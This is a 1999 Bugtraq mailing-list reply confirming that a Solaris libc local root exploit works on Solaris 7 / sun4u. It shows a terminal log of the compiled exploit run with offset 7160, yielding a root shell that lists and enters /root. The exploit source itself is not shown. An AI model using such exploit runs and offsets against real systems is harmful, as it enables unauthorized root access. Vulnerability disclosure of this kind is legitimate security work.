[10614] in bugtraq
Re: Solaris libc exploit
daemon@ATHENA.MIT.EDU (Cliff)
Mon May 24 01:12:11 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <3748C2D0.57FE29B7@u.washington.edu>
Date: Sun, 23 May 1999 20:09:05 -0700
Reply-To: Cliff <cliffo@U.WASHINGTON.EDU>
From: Cliff <cliffo@U.WASHINGTON.EDU>
To: BUGTRAQ@NETSPACE.ORG
Works nicely on Solaris7 / sun4u using acpizer's modified source and the
offsets listed...
nowhere:~/temp/crack$ ./a.out 7160
jumping address : ffbedf10, offset = 7160
# uname -a
SunOS nowhere 5.7 Generic sun4u sparc sun4u
# ls -al /
.
.
.
drwx------ 17 root root 1536 May 23 00:18 root
.
.
.
# cd /root
# pwd
/root
#
